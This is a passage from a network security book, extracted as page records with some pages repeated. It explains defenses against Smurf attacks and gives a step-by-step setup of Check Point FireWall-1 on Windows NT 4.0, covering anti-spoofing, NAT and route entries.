at the source site, bounce site, and target site to \nhelp limit the effects of a Smurf attack. \nBlocking Smurf at the Source \nSmurf relies on the attacker’s ability to transmit an echo request with a spoofed source address. You can stop this \nattack at its source by using the standard access list described earlier in this chapter. This will insure that all traffic \noriginating from your network does in fact have a proper source address—stopping the attack at its source. \nBlocking Smurf at the Bounce Site \nIn order to block Smurf at the bounce site, you have two options. The first is to simply block all inbound echo \nrequests. This will prevent these packets from ever reaching your network. \nIf blocking all inbound echo requests is not an option, then you need to stop your routers from mapping traffic \ndestined for the network broadcast address to the LAN broadcast address. By preventing this mapping, your \nsystems will no longer receive these echo requests. \nTo prevent a Cisco router from mapping network broadcasts to LAN broadcasts, enter configuration mode for the \nLAN interface and enter the command \nno ip directed-broadcast \nWarning \nThis must be performed on every LAN interface on every router. This command will \nnot be effective if it is performed only on your perimeter router. \nBlocking Smurf at the Target Site \nUnless your ISP is willing to help you out, there is little you can do to prevent the effects of Smurf on your WAN \nlink. While you can block this traffic at the network perimeter, this is too late to prevent the attack from eating up \nall of your WAN bandwidth. \nYou can, however, minimize the effects of Smurf by at least blocking it at the perimeter. By using reflexive access \nlists or some other firewalling device that can maintain state, you can prevent these packets from entering. Since \nyour state table would be aware that the attack session did not originate on the local network (it would not have a \ntable entry showing the original echo request), this attack would be handled like any other spoof attack and \npromptly dropped. \n \nChapter 7: Check Point’s FireWall-1 \nChoosing which firewall to cover in this chapter was difficult. There are many firewall products on the market, \nwith a wide range of features. I chose FireWall-1 because it is by far the most popular firewall on the market \ntoday. It has enjoyed a larger deployment than any other firewall solution, barring the Cisco router that we covered \nin Chapter 6. \nFireWall-1 Overview \nFireWall-1 supports a wide range of features, but uses three primary components to create and enforce security \npolicies: \nƒ GUI management interface \nƒ Management Server \nƒ FireWall Module \nGUI Management Interface \nA GUI client is used to define a network (or enterprise) Security Policy (along with Address Translation and \nBandwidth policies), which in turn is defined by using network objects (hosts, gateways, etc.) and security rules. \nThe GUI includes the Log Viewer and System Status Viewer. \n" }, { "page_number": 144, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 144\nFireWall-1 creates an INSPECT script from the policies (Security, Address Translation, and/or Bandwidth) that \nare defined at the GUI. INSPECT is an object-oriented, high-level scripting language that is proprietary to Check \nPoint. The INSPECT script is then compiled to create the Inspection Code, which is then loaded into the various \nInspection Modules (discussed later in this chapter) on the network. Because the original INSPECT scripts are text \nfiles, they can be customized by security administrators to meet specific needs. \nManagement Server \nAlthough the various policies are created using the GUI client, they are actually stored on the Management Server. \nThe Management Server is responsible for storing and maintaining all FireWall-1 databases, (including those for \nnetwork object and user definitions), policies, and log files for all network enforcement points. \nFireWall Module \nA FireWall Module is a software component that is installed on any network enforcement point (usually a \ngateway). FireWall Modules receive the policies from the Management Server and implement them, thereby \nsecuring the network. \nInspection Module \nThe Inspection Module is loaded in the OS, below the network layer (below in reference to the OSI model) but \nabove the data-link layer. Packets are analyzed by the Inspection Module and compared to the policies. \nIP addresses, port numbers, and state information from previous communications are all analyzed by the \nInspection Module to determine if the policies will permit the packets. All state and context information for all \nsessions are stored in dynamic connection tables. Continually updated, these tables provide the Inspection Module \nwith cumulative data with which it checks follow-on communications. \nSecurity Servers \nSecurity Servers are responsible for user authentication and content security. Authentication and can work with \nFTP, HTTP, Rlogin, and telnet. Some of the authentication schemes (or vendor technologies) that can be used with \nFireWall-1 include: \nƒ \nFireWall-1 Password \nƒ \nOS Password \nƒ \nS/Key \nƒ \nSecurID Tokens \nƒ \nRADIUS \nƒ \nAxent Pathways Defender \nƒ \nTACACS/TACACS+ \nƒ \nDigital Certificates \nThere are three different authentication methods that can be used with the above schemes: \nUser Authentication Conducted transparently (the user does not connect explicitly to the \nFireWall-1 gateway), User Authentication allows access from any IP address. \nClient Authentication Available for any service, Client Authentication is associated with a \nparticular IP address, and may or may not be transparent. \nSession Authentication User connection requests are intercepted by FireWall-1, which then \nactivates the Session Authentication Agent (installed on the client). Upon successful receipt of \ncredentials, FireWall-1 completes the connection request. \n" }, { "page_number": 145, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 145\nSecurity Servers are also responsible for Content Security, which is available for the following protocols: \nHTTP controls content based on schemes (HTTP, FTP, etc), methods (GET and POST), hosts \n(*.com), paths, and queries. \nFTP controls content based on anti-virus checks on the files, as well as file name restrictions, and \nFTP commands (GET and PUT). \nSMTP controls content based on address fields (“From” and “To”), as well as header and \nattachment types (*.VBS). Address translation is also available, hiding real user names from the \noutside world while still preserving the ability to restore correct address in a response. \nSecurity and Management Services \nIn addition to authentication and content filtering, FireWall-1 provides the following security and management \nservices: \nƒ NAT (Network Address Translation) \nƒ VPN (Virtual Private Networks) \nƒ LDAP (Lightweight Directory Access Protocol) Account Management \nƒ Third-party device management (Open Security Extension) \nƒ Fault-tolerance (High Availability) \nƒ Load balancing (ConnectControl) \nNetwork Address Translation (NAT) \nNAT maps private IP addresses to one or more public IP addresses. FireWall-1 provides both dynamic and static \naddress mapping through two methods: \nGraphical Address Translation Rule Base An Address Translation Rule Base can be used to \nspecify objects by name rather than by IP address (the objects having been assigned an IP address \npreviously). Rules can then be applied to specific destination and source IP addresses or services. \nAutomatic Configuration With Automatic Configuration, translation properties are assigned to \nnetwork objects (such as networks or workstations), and then rules are automatically generated for \nthese properties. \nVirtual Private Networks (VPN) \nCheck Point’s VPN-1 Gateway is a combination of FireWall-1 and an optional VPN module. VPN-1 provides site-\nto-site and remote user VPN access while supporting industry standard protocols: \nƒ \nDES \nƒ \nTriple DES \nƒ \nIPSec/IKE \nƒ \nDigital certificates \nFor more on VPN, see Chapter 10, “Virtual Private Networking.” \n" }, { "page_number": 146, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 146\nLightweight Directory Access Protocol (LDAP) \nFireWall-1 uses an Account Management module to pull user data from any LDAP-compliant server. As a result, \nLDAP users (and even servers) can be used by rules like any other network object. A simple example would be a \nuser outside the firewall requesting access to resources behind the gateway. Because the FireWall Module can \nquery the LDAP database stored on a third-party LDAP-compliant server to verify the credentials offered by a \nuser, the importation of large user databases is not needed. \nThe Account Management Client can be launched from the FireWall-1 GUI or as a stand-alone application. \nTemplates can be used to apply configuration properties to multiple users at once. Any change in a template is \nautomatically made to all users who are associated with the template. Because all the components involved \n(FireWall-1, Account Management Client, and LDAP servers) use SSL, the communication is secure. \nThird-Party Device Management \nThe Open Security Extension is an optional component that takes a network-wide policy and applies it to third-\nparty security devices from vendors like 3Com, Microsoft, Cisco, and Nortel. Once a Security Policy is defined, \nFireWall-1 creates an ACL (Access Control List) and sends it to each router and device in the network. \nThe Open Security Extension also has the ability to import pre-existing Access Lists as Security Policy objects, \nalong with log messages, allowing for centralized management of policies in conjunction with logging and \nreporting. \nFault Tolerance \nBecause all FireWall Modules on a network share connection and state information, each individual FireWall \nModule has a complete awareness of all network communications. If a FireWall Module fails, another FireWall \nModule takes control and maintains the connection in its place. \nBecause the state tables of each connection are continually synchronized between FireWall Modules, the system \ncan support asymmetric routing. Without this information, packets that are part of the same session but travel \nthrough different routes and different gateways might be interpreted differently, and some might be dropped. \nLoad Balancing \nConnectControl is an optional module that creates a Logical Server object (multiple physical servers providing the \nsame service). Rules can be defined that direct all connections of a particular server to a given Logical Server. \nClients are only aware of one Logical Server, although in reality they are connected to any of the physical servers \nmaking up the Logical Server. There are five load-balancing algorithms: \nServer load Only available when a server has a load-measuring agent installed, FireWall-1 uses \nthe information from the various agents to determine which server is best able to handle the \nincoming connection. \nRound trip PING data determines which server has the shortest round-trip time and therefore \nshould handle a connection. \nRound robin The next server in the list is assigned the connection. \nRandom A server is selected based on a random algorithm. \nDomain The closest server as determined by domain names is chosen. \nFinding Good FireWall-1 Support \nThe best technical information on FireWall-1 outside of Check Point comes from Phoneboy—specifically \nwww.phoneboy.com. In addition to one of the best FAQ sites on the product, the site hosts a moderated list \ndedicated to FireWall-1 at www.phoneboy.com/fw1/wizards/index.html \n" }, { "page_number": 147, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 147\nOf course, you can still subscribe to the official Check Point FireWall-1 mailing list by sending a message to \n \nwith the words \nsubscribe fw-1-mailinglist \nin the body of the message. Although this list is operated by Check Point, it is truly an unmoderated list. \nSubscribers discuss problems and complaints quite openly, and only rarely do you see someone from Check Point \nposting to the list. This means that you receive advice and help from neighborly people within the end-user \ncommunity. This is always a good thing—you are far more likely to receive straight advice, not marketing hype. \n \nChoosing a Platform \nOne of FireWall-1’s strengths is the diversity of platforms it supports. FireWall-1 components work with various \noperating systems as illustrated in Table 7.1. \nTable 7.1: Operating Systems support by FireWall-1 \nFireWall-1 Modules \nOperating \nSystems \nManagement Server and Enforcement Module \nMicrosoft \nWindows \nNT 4.0 \n(SP4–\nSP6a) \n \nSun \nSolaris \n2.6, \nSolaris 7 \n(32-bit \nmode \nonly) \n \nRed Hat \nLinux 6.1 \n(with \nkernel \n2.2.x) \n \nHP-UX \n10.20, \n11.0 (32-\nbit mode \nonly) \n \nIBM AIX \n4.2.1, \n4.3.2, \n4.3.3 \nGUI Client \nMicrosoft \nWindows \n9x, NT, \n2000 \n \nSun \nSolaris \nSPARC \n \nHP-UX \n10.20 \n \nIBM AIX \n" }, { "page_number": 148, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 148\nWe will use the NT 4.0 version as a model for our discussion. There are a number of reasons for this selection: \nƒ The information required to secure a UNIX system for firewall use has been widely distributed. \nTechniques for securing NT are less common. \nƒ NT and NT product versions are less mature than their UNIX counterparts, so there are a \nnumber of caveats to watch out for during an installation. \nƒ Running a firewall on NT is becoming extremely popular. \nFor these reasons, our discussion will be limited to the NT version of the product. While there are many interface \nsimilarities between the NT and UNIX versions (you can even run the firewall on a UNIX platform and the control \nsoftware from NT), the installation process does vary greatly between versions. \nPrepping NT for Firewall Installation \nFirst let’s look at getting NT ready for the firewall product installation. There are a number of tweaks you can \nperform in order to increase security and optimize performance. \nHardware Requirements \nA production NT server that will be used as a firewall should meet or exceed the following criteria (I am assuming \nthat you will have a T1-speed connection or less and that the server will be dedicated to firewall functionality): \nƒ \nPentium 200 processor \nƒ \n1GB of disk storage \nƒ \nRAID III or higher redundancy \nƒ \n128MB of RAM (minimum for FireWall-1 per Check Point’s recommendation) \nƒ \n2 PCI network cards \nWhile FireWall-1 will run on a lesser platform, Internet performance and availability have quickly become critical \nfunctions. If you are just bringing up an Internet connection for the first time, you will be amazed how quickly \nyour organization relies on it, just like any other business service. \nInstalling NT \nFireWall-1 will run on NT server or workstation. Since this system should be dedicated to firewall functionality, \nthe license count difference between these two products should not be an issue. Therefore, you can use either \nproduct. It is recommended, however, that NT server be used, because the permission setting on the Registry \nmakes this platform a bit more secure. \nNote \nThe Windows NT Registry, which stores all the configuration information for the system, \nvaries slightly between NT Server and Workstation. NT Server has a stricter access \ncontrol policy with regard to Registry keys. This insures that only the system \nadministrator is able to change the values stored within the database keys, thus increasing \nthe integrity of the Registry information. \nWhen installing NT server, observe the following guidelines: \nƒ \nInstall all required network cards before loading NT. \nƒ \nCreate an NTFS C partition of at least 800MB which will hold the NT operating system \nand swap file. \nƒ \nCreate an NTFS D partition of the remaining drive space (200MB minimum) to hold the \nfirewall software as well as the firewall logs. \nƒ \nLoad TCP/IP as the only protocol. Make sure IP forwarding is enabled. \nƒ \nRemove all services unless you plan to have this server join a domain in order to use OS \nauthentication for inbound access. If you do wish to use OS authentication, you will need \nto run the Computer Browser, NetBIOS Interface, RPC Configuration, Server, and \nWorkstation services. \nƒ \nInstall the SNMP service if you choose to use it (see the “Installing FireWall-1” section for \nsome caveats). \n" }, { "page_number": 149, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 149\nƒ \nConfigure the system as a stand-alone workgroup, not a domain, whenever possible. \nƒ \nIf the server will be part of a domain, disable all WINS bindings on the external interface. \nƒ \nDisable the guest account and create a new Administrator-equivalent account for \nperforming firewall management. When you are ready to install the firewall software, log \noff as Administrator, log on as the new account name, and disable the Administrator \naccount. \nƒ \nEnable auditing and track logon failures in User Manager. Under User Rights, remove the \nright for all users to log on from the network. Modify the Logon Locally right to include \nonly the user name you created as an Administrator equivalent. \nƒ \nInstall Service Pack 6a. This is considered the most stable service pack and has the most \ncomprehensive security fixes to date. \nƒ \nChange the boost to the foreground application to None under the Performance tab in \nSystem Properties. \nƒ \nIf you are running the server service (for domain authentication), go to the Server \nProperties dialog box and change Optimization to Maximize throughput for network \napplications. \nTip \nNT has a problem where it associates driver names with the NIC card loading order in the \nRegistry. If the card settings are changed in any way (IRQ change, cards added or removed, \nand so on), this Registry setting may become corrupt. You can check this by running the \nipconfig command, which will return incorrect card information or an error message that \nstates, \"The Registry has become corrupt.\" This is why it is important to install the NICs \nbefore installing NT. The only sure fix is to reload the operating system and all patches \nfrom scratch (not as an upgrade). \nOnce you have followed these guidelines, you are ready to make an emergency recovery disk and begin the \nFireWall-1 product install. Remember that if you load any new software from the NT server CD after this point, \nyou will have to reinstall \nƒ \nSP6a \nƒ \nAll hotfixes \nƒ \nThe firewall software (as an update) \nƒ \nThe firewall patch \nMake sure you have your system exactly the way you want it before you install the firewall software. \nPre-install Flight Check \nAt this point, you should verify that the firewall platform has IP connectivity. Create a default route that points to \nthe local router interface leading to the Internet. Create required route table entries for any internal network \nsegments that are not directly connected to the firewall. The correct syntax to use when creating route table entries \nis \nroute add -p {remote IP} mask {subnet mask} {gateway address} \nSo to create a route entry to the network 192.168.2.0, which is on the other side of a local router at IP address \n192.168.1.5, you would type \nroute add -p 192.168.2.0 mask 255.255.255.0 192.168.1.5 \nLikewise, if the route entry was only for the host 192.168.2.10, you would type \nroute add -p 192.168.2.10 mask 255.255.255.255 192.168.1.5 \nNote \nThe -p switch tells the operating system to make this route entry permanent, allowing the \nroute entry to remain persistent over operating system reboots. \nOnce you have created your route table, you should test connectivity. This can be done using ping and traceroute. \nAt this point, the firewall platform should have connectivity to all internal and external hosts. If it does not, you \nneed to troubleshoot the problem before going any further. \n" }, { "page_number": 150, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 150\nYou should also make sure that you can ping external IP addresses from internal hosts. This will not be possible, \nhowever, if you are using private address space for your internal hosts. If you are using private address space, \npinging the external interface of the firewall should suffice. \nYou should also run the ipconfig command and record the adapter drive name associated with the external IP \naddress. This name will be similar to Elnk32. This information will be required later during the firewall software \ninstallation if you have purchased a single gateway product. Make sure you record the name exactly, because the \nentry is case sensitive. \nTip \nIf you are worried about someone trying to break in to your network while you are testing \nfor connectivity, simply disconnect the WAN connection to your router. You can then test \nconnectivity as far as the IP address on the router’s serial interface. \nGenerating a License \nOnce you have verified connectivity, you are ready to generate a firewall license. This is done by pointing your \nWeb browser at \nhttp://license.checkpoint.com/ \nBy filling in the online forms, you can register the product and generate a valid license key. The information you \nwill be prompted for includes \nƒ \nWho you are \nƒ \nYour e-mail address \nƒ \nWho sold you the software \nƒ \nThe certificate key number on the inside jacket of the CD case \nƒ \nThe platform and operating system you plan to use \nƒ \nThe external IP address of the firewall \nOnce you complete the forms, you will be presented with a valid host ID, feature set, and license key. This \ninformation will also be sent to the e-mail address that you specified on the form. Once you have this information \nin hand, you are ready to begin your firewall installation. \nNote \nThe firewall software ships with a 30-day evaluation license that will expire on a specific \ndate (not 30 days after the software is installed). You can use this license to get your \nfirewall up and running if you need it, but the evaluation may not support all the options \nyou require. \n \nChoosing a Platform \nOne of FireWall-1’s strengths is the diversity of platforms it supports. FireWall-1 components work with various \noperating systems as illustrated in Table 7.1. \nTable 7.1: Operating Systems support by FireWall-1 \nFireWall-1 Modules \nOperating Systems \nManagement Server and \nEnforcement Module \nMicrosoft Windows NT 4.0 (SP4–SP6a) \n \nSun Solaris 2.6, Solaris 7 (32-bit mode only) \n \nRed Hat Linux 6.1 (with kernel 2.2.x) \n \nHP-UX 10.20, 11.0 (32-bit mode only) \n \nIBM AIX 4.2.1, 4.3.2, 4.3.3 \nGUI Client \nMicrosoft Windows 9x, NT, 2000 \n \nSun Solaris SPARC \n \nHP-UX 10.20 \n" }, { "page_number": 151, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 151\nTable 7.1: Operating Systems support by FireWall-1 \nFireWall-1 Modules \nOperating Systems \n \nIBM AIX \nWe will use the NT 4.0 version as a model for our discussion. There are a number of reasons for this selection: \nƒ The information required to secure a UNIX system for firewall use has been widely distributed. \nTechniques for securing NT are less common. \nƒ NT and NT product versions are less mature than their UNIX counterparts, so there are a \nnumber of caveats to watch out for during an installation. \nƒ Running a firewall on NT is becoming extremely popular. \nFor these reasons, our discussion will be limited to the NT version of the product. While there are many interface \nsimilarities between the NT and UNIX versions (you can even run the firewall on a UNIX platform and the control \nsoftware from NT), the installation process does vary greatly between versions. \nPrepping NT for Firewall Installation \nFirst let’s look at getting NT ready for the firewall product installation. There are a number of tweaks you can \nperform in order to increase security and optimize performance. \nHardware Requirements \nA production NT server that will be used as a firewall should meet or exceed the following criteria (I am assuming \nthat you will have a T1-speed connection or less and that the server will be dedicated to firewall functionality): \nƒ \nPentium 200 processor \nƒ \n1GB of disk storage \nƒ \nRAID III or higher redundancy \nƒ \n128MB of RAM (minimum for FireWall-1 per Check Point’s recommendation) \nƒ \n2 PCI network cards \nWhile FireWall-1 will run on a lesser platform, Internet performance and availability have quickly become critical \nfunctions. If you are just bringing up an Internet connection for the first time, you will be amazed how quickly \nyour organization relies on it, just like any other business service. \nInstalling NT \nFireWall-1 will run on NT server or workstation. Since this system should be dedicated to firewall functionality, \nthe license count difference between these two products should not be an issue. Therefore, you can use either \nproduct. It is recommended, however, that NT server be used, because the permission setting on the Registry \nmakes this platform a bit more secure. \nNote \nThe Windows NT Registry, which stores all the configuration information for the system, \nvaries slightly between NT Server and Workstation. NT Server has a stricter access \ncontrol policy with regard to Registry keys. This insures that only the system \nadministrator is able to change the values stored within the database keys, thus increasing \nthe integrity of the Registry information. \nWhen installing NT server, observe the following guidelines: \nƒ \nInstall all required network cards before loading NT. \nƒ \nCreate an NTFS C partition of at least 800MB which will hold the NT operating system \nand swap file. \nƒ \nCreate an NTFS D partition of the remaining drive space (200MB minimum) to hold the \nfirewall software as well as the firewall logs. \nƒ \nLoad TCP/IP as the only protocol. Make sure IP forwarding is enabled. \n" }, { "page_number": 152, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 152\nƒ \nRemove all services unless you plan to have this server join a domain in order to use OS \nauthentication for inbound access. If you do wish to use OS authentication, you will need \nto run the Computer Browser, NetBIOS Interface, RPC Configuration, Server, and \nWorkstation services. \nƒ \nInstall the SNMP service if you choose to use it (see the “Installing FireWall-1” section for \nsome caveats). \nƒ \nConfigure the system as a stand-alone workgroup, not a domain, whenever possible. \nƒ \nIf the server will be part of a domain, disable all WINS bindings on the external interface. \nƒ \nDisable the guest account and create a new Administrator-equivalent account for \nperforming firewall management. When you are ready to install the firewall software, log \noff as Administrator, log on as the new account name, and disable the Administrator \naccount. \nƒ \nEnable auditing and track logon failures in User Manager. Under User Rights, remove the \nright for all users to log on from the network. Modify the Logon Locally right to include \nonly the user name you created as an Administrator equivalent. \nƒ \nInstall Service Pack 6a. This is considered the most stable service pack and has the most \ncomprehensive security fixes to date. \nƒ \nChange the boost to the foreground application to None under the Performance tab in \nSystem Properties. \nƒ \nIf you are running the server service (for domain authentication), go to the Server \nProperties dialog box and change Optimization to Maximize throughput for network \napplications. \nTip \nNT has a problem where it associates driver names with the NIC card loading order in the \nRegistry. If the card settings are changed in any way (IRQ change, cards added or removed, \nand so on), this Registry setting may become corrupt. You can check this by running the \nipconfig command, which will return incorrect card information or an error message that \nstates, \"The Registry has become corrupt.\" This is why it is important to install the NICs \nbefore installing NT. The only sure fix is to reload the operating system and all patches \nfrom scratch (not as an upgrade). \nOnce you have followed these guidelines, you are ready to make an emergency recovery disk and begin the \nFireWall-1 product install. Remember that if you load any new software from the NT server CD after this point, \nyou will have to reinstall \nƒ \nSP6a \nƒ \nAll hotfixes \nƒ \nThe firewall software (as an update) \nƒ \nThe firewall patch \nMake sure you have your system exactly the way you want it before you install the firewall software. \nPre-install Flight Check \nAt this point, you should verify that the firewall platform has IP connectivity. Create a default route that points to \nthe local router interface leading to the Internet. Create required route table entries for any internal network \nsegments that are not directly connected to the firewall. The correct syntax to use when creating route table entries \nis \nroute add -p {remote IP} mask {subnet mask} {gateway address} \nSo to create a route entry to the network 192.168.2.0, which is on the other side of a local router at IP address \n192.168.1.5, you would type \nroute add -p 192.168.2.0 mask 255.255.255.0 192.168.1.5 \nLikewise, if the route entry was only for the host 192.168.2.10, you would type \nroute add -p 192.168.2.10 mask 255.255.255.255 192.168.1.5 \n" }, { "page_number": 153, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 153\nNote \nThe -p switch tells the operating system to make this route entry permanent, allowing the \nroute entry to remain persistent over operating system reboots. \nOnce you have created your route table, you should test connectivity. This can be done using ping and traceroute. \nAt this point, the firewall platform should have connectivity to all internal and external hosts. If it does not, you \nneed to troubleshoot the problem before going any further. \nYou should also make sure that you can ping external IP addresses from internal hosts. This will not be possible, \nhowever, if you are using private address space for your internal hosts. If you are using private address space, \npinging the external interface of the firewall should suffice. \nYou should also run the ipconfig command and record the adapter drive name associated with the external IP \naddress. This name will be similar to Elnk32. This information will be required later during the firewall software \ninstallation if you have purchased a single gateway product. Make sure you record the name exactly, because the \nentry is case sensitive. \nTip \nIf you are worried about someone trying to break in to your network while you are testing \nfor connectivity, simply disconnect the WAN connection to your router. You can then test \nconnectivity as far as the IP address on the router’s serial interface. \nGenerating a License \nOnce you have verified connectivity, you are ready to generate a firewall license. This is done by pointing your \nWeb browser at \nhttp://license.checkpoint.com/ \nBy filling in the online forms, you can register the product and generate a valid license key. The information you \nwill be prompted for includes \nƒ \nWho you are \nƒ \nYour e-mail address \nƒ \nWho sold you the software \nƒ \nThe certificate key number on the inside jacket of the CD case \nƒ \nThe platform and operating system you plan to use \nƒ \nThe external IP address of the firewall \nOnce you complete the forms, you will be presented with a valid host ID, feature set, and license key. This \ninformation will also be sent to the e-mail address that you specified on the form. Once you have this information \nin hand, you are ready to begin your firewall installation. \nNote \nThe firewall software ships with a 30-day evaluation license that will expire on a specific \ndate (not 30 days after the software is installed). You can use this license to get your \nfirewall up and running if you need it, but the evaluation may not support all the options \nyou require. \nFireWall-1 Security Management \nManaging a security policy through FireWall-1 is a multistep process. First, you must define objects you wish to \ncontrol, and then you must define users, after which you apply these objects to the rule base. While this \nconfiguration may seem a bit complex, it is actually quite straightforward and allows for extremely granular \nsecurity control. All security management is performed through the Security Policy-1 tab of the Policy Editor as \nshown in Figure 7.6. \n" }, { "page_number": 154, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 154\n \nFigure 7.6: The FireWall-1 Policy Editor (with the Security Policy 1 tab selected) \nBegin by defining your network objects. Select Manage ¾ Network Objects from the Security Policy-1 menu (the \navailable menu options change depending on which policy tab is selected), which will produce the Network Object \nmanagement screen as shown in Figure 7.7. When you start this screen for the first time, there will be no entries. \n \nFigure 7.7: The Network Objects management screen \nThere a number of different object types that can be created. These include \nWorkstation This is a generic object used to create any computer host. This includes hosts with \nmultiple NIC cards, such as the firewall. \nNetwork This object is used to define an entire IP subnet. This is useful when you wish to apply \nthe same security policy to an entire subnet. \nDomain This object is used to define all hosts within a specific DNS domain name. It is \nrecommended that you do not use this object, because it relies on accurate DNS information and \nslows down the processing speed of the firewall. \nRouter This object is used to define network routers. FireWall-1 has the ability to convert policies \ncreated through the Policy Editor to access lists and to update defined routers automatically. \n" }, { "page_number": 155, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 155\nSwitch This object allows you to define network switches. \nIntegrated Firewall This object represents an installed FireWall-1 module (also known as an \nenforcement point). \nGroup This object allows you to collect multiple objects under one. For example, you could create \na group of all network objects and refer to them as the group local net. \nLogical Server A grouping of two or more modules providing the same service, this object is used \nto enable load balancing. \nAddress Range Instead of an entire IP subnet, this object allows a security policy to be applied to a \ncollection of addresses. \nCreating an Object for the Firewall \nThe first object you should create is one representing the firewall. This is done by selecting New ¾ Workstation \nfrom the Network Objects management screen. The will produce the Workstation Properties screen shown in \nFigure 7.8. \n \nFigure 7.8: The Workstation Properties screen \nFirst, assign a name and an IP address. The system name should be the same as the computer’s DNS host name \nand the Microsoft computer name. Also, it is beneficial to standardize on a single address when referring to the \nfirewall, even though it has multiple interfaces. Typically, the external interface is used. This should be consistent \nwith your local DNS. You may even want to create a hosts file entry on the firewall that includes the system’s \nname and external IP address. \nTip \nFireWall-1 will run faster if the NT server has an entry for itself in the local hosts file stored \nin C:\\winnt\\system32\\drivers\\etc. \nThe firewall and any system that sits behind it are considered to be on the internal network. The only systems \nconsidered external are the ones sitting outside the external interface of the firewall. Also, since this system has \nmultiple NIC cards, it is considered a gateway, not a host. Finally, you should indicate that FireWall-1 is installed \non this machine. \nIf you click the Interfaces tab, you will be presented with a list of system interfaces. Since you have not created \nany entries yet, the list will be blank. To create an entry, click the Add button. This will produce the Interface \nProperties screen shown in Figure 7.9. \n" }, { "page_number": 156, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 156\n \nFigure 7.9: The Interface Properties screen \nHere is where you will define your IP spoofing rules. By configuring each of your interfaces, you can insure that \nthe firewall only accepts traffic from a valid IP address. This will help to prevent Smurf and other attacks that rely \non using a spoofed address. \nThe name you use for each interface should match the adapter name used by Windows NT. This will insure that \nthe spoofing rules are applied to the correct interface. You also need to enter the locally attached network address \n(not the IP address of the NIC but the network subnet address), as well as a valid subnet mask. \nNext you will define what traffic source addresses are valid. To do this, select one of the options under Valid \nAddresses. Here’s what each option means: \nAny This option, the default, assumes that life is happy and we trust everyone. No screening takes \nplace for any spoofed IP traffic. \nNo security policy! This option is the same as the Any option. No spoof detection is performed. \nOthers This option is used in combination with the spoofing filters defined for the other interfaces. \nIn effect, this options states, “All traffic is acceptable except for what has been defined on another \ninterface.” This is the option you would typically select for your external interface. \nOthers + This option is the same as Others, except that you have the option to define an additional \nhost, network, or group whose traffic would be considered acceptable, as well. \nThis net This option states that only traffic from the locally connected subnet will be accepted. \nThis is useful for defining a DMZ or an internal network segment that has no routed links leading to \nother subnets. \nSpecific This option allows you to specify a particular host, network, or group whose traffic would \nbe considered acceptable. This is useful for defining your internal network when you have multiple \nsubnets. \nOnce you specify which addresses are valid, you must then tell the firewall what to do when it detects a spoofed \naddress. Your options are \nNone Why would I want to know about spoofed packets? \nLog Create a log entry in the firewall log indicating a spoofed packet was detected. \nAlert Log the event and take some form of pre-configured action. \nNote \nYou can configure alerts from the Security Policy-1 menu by selecting Policy ¾ \nProperties and clicking the Log and Alert tab. \n" }, { "page_number": 157, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 157\nAt a minimum, you should log any attempts to use spoofed packets against your network. The Alert option is \nuseful because it allows you to define some other method of notification that may be able to get your attention \nmore quickly. For example, you could have the firewall send you an e-mail message stating that an alert condition \nhas been encountered. \nRepeat this process for each interface that has been installed in your firewall. Once you’ve done so, you are ready \nto click OK and save your firewall network object. \nWorking with NAT \nLet’s create a few more network objects—only we will assume that the internal network is using private address \nspace. This means that your firewall will need to perform network address translation between your internal \nnetwork and the Internet. \nAs an example, let’s set up an internal host that will be acting as a mail relay. Since this host needs to be reachable \nfrom the Internet, you will need to use static NAT. Repeat the initial steps you used to configure the firewall \nobject. The only configuration difference is under the General tab of the Workstation Properties screen: leave the \nFireWall-1 installed check box unchecked. You may also wish to set a different color for this object in order to \ndistinguish it from other objects. \nOnce you have filled out all the general information, instead of selecting the Interfaces tab, select the Address \nTranslation tab. The screen should appear similar to Figure 7.10. \n \nFigure 7.10: The Address Translation tab of the Workstation Properties screen \nConfiguring the workstation object to use NAT is pretty straightforward. Once you select the Add Automatic \nAddress Translation Rules check box, the other options become active. For a translation method, you can select \nHide Hide the system behind a legal address. \nStatic Map this private address to a legal address. \nSince this system needs to be reachable, define the Translation Method as Static. Next, enter a legal IP address to \nuse in the Valid IP Address field. The Install On option lets you choose which firewalled object enforces address \ntranslation rules. Choosing All installs the rules on all firewalled objects. Finally, click OK and install this entry \ninto your rule base. \nCreating Route Entries on the Firewall \nYou need to perform one more step in order to have this translated address handled correctly. Since NT is actually \nproviding the routing functionality, not FireWall-1, you need to fool NT by creating a static route entry at the \ncommand prompt which associates the static NAT address with the host’s legal IP address. Do this by typing the \ncommand \nroute add -p {legal IP address} mask 255.255.255.255 {private IP address} \n" }, { "page_number": 158, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 158\nFor example, if the IP address assigned to the mail relay is 192.168.1.10, and the legal static NAT address is \n206.121.73.10, the entry would appear as follows: \nroute add -p 206.121.73.10 mask 255.255.255.255 192.168.1.10 \nThis is correct, provided that the host is attached to a segment that is locally connected to the firewall. If the host is \nlocated on a remote segment that is on the other side of a router, you should replace the private IP address entry \nwith the router’s local address. \nProblems with ARP \nUsing NAT can cause problems when translating between OSI layer 2 (data link) and OSI layer 3 (network) \ncommunications. To see how this problem occurs, take a look at the network shown in Figure 7.11. The internal \nnetwork is using private address space. This means that in order for the mail relay to have full Internet \nconnectivity, static NAT must be used. \n \nFigure 7.11: A network using private address space \nNow let’s assume that your ISP issues you a single class C address space of 206.121.73.0. You assign \n206.121.73.1 to the Ethernet interface on the router, 206.121.73.2 to the external interface on the firewall, and you \nwish to use 206.121.73.10 as the static NAT address for the mail relay. This creates an interesting problem. Let’s \nfollow the communication session when you try to send an outbound e-mail message to see what happens. For \nsimplicity, let’s assume that your mail relay already knows the IP address of the external host to which it needs to \ndeliver a message. \nYour mail relay identifies that it needs to deliver a message to an external host. It creates an IP header using its \nassigned IP address as the source address (192.168.1.10), and the IP address of the remote mail system as the \ndestination IP address (192.52.71.4). The mail relay sets SYN=1 on this initial packet in order to establish a new \nsession. Your mail relay would then ARP for 